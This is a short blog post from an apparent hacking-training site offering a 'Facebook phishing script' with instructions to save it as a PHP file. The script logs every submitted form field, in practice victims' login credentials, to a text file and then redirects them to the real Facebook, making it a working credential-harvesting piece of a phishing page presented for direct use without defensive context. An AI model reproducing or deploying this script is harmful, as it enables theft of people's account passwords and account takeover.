page content Facebook phising script updated 2015 ~ Ethical Hacking & CEH Training In Patna

11.3.14

Facebook phising script updated 2015

Just copy the below script in notepad and save it as anyname.php

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

0 comments:

Twitter Delicious Facebook Digg Stumbleupon Favorites More